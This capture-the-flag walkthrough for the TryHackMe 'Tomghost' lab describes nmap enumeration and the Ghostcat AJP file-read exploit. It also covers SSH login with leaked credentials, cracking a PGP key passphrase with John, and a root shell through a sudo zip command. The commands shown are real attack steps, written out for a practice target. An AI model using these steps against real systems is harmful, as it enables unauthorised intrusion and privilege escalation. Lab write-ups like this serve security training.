# Tomghost

## Nmap

```
sudo nmap 10.10.16.201 -p- -sS -sV

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 
(Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open  http       Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 8080 is running Tomcat as shown below:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5406d6aad6fb44800645d92ede5106ea1bb6703e%2Fimage.png?alt=media)

Port 8009 is running ajp13. Researching this service shows this is a port that runs alongside Apache Tomcat. A brief description of this service is shown below:

*Ajp13 protocol is packet-oriented TCP protocol, by default this service runs on port 8009. AJP13 protocol is a binary format, which is intended for better performance over the HTTP protocol running over TCP port 8080*.

Researching exploits for this service we can see a vulnerability known as Ghostcat. This exploit (**CVE-2020-10487**) allows us to read local files in the Tomcat web directory and even configuration files. Below is a PoC for this on Github.

{% embed url="<https://github.com/00theway/Ghostcat-CNVD-2020-10487>" %}

First download the python file and run with the following syntax:

```
python3 exploit.py <TargetIP> <PORT> <FileToRead> read 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-05e04a9b1cfde96f77a3ebdfdaf85a25dc6ee00b%2Fimage.png?alt=media)

We now have the credentials: `skyfuck:8730281lkjlkjdqlksalks` Using the gathered cerednetials we are then able to connect by SSH.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-169657f9de68c100b5cefe36d16936b6c6f7d682%2Fimage.png?alt=media)

The home directory for skyfuck contains a file called tryhackme.asc. The file can be used to decrypt the contents of credential.pgp.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-082fcf8fc93f70d513b2612b17b2f6b1a3c4f99f%2Fimage.png?alt=media)

First we need to copy the contents of tryhackme.asc to our attacking machine then use `gpg2john` to create a hash of the file. After completing this John can be run to crack the passphrase.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cb75fb1bdfd78b703ff154f75b21546211b2fa1e%2Fimage.png?alt=media)

Then on the SSH session import the key then attempt to decrypt the credential.pgp file with `gpg -d`.

```
gpg --import tryhackme.asc
gpg -d credential.pgp
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ca495ba8706dd8b74a5e4d849866e9814bcc5073%2Fimage.png?alt=media)

Which we can then SSH in as the user 'merlin'.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6e02d7aa7fa64ec8a3540004d38d10d2f3808ba0%2Fimage.png?alt=media)

Running `sudo -l` on the user shows we can run the zip binary as root without supplying a password. Refering to GTFOBins at <https://gtfobins.github.io/gtfobins/zip/>. Shows for the zip binary we can gain a root shell running:

```
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5f02a6c596e9a8ed4ea4f7c8dc440a5e06ae0904%2Fimage.png?alt=media)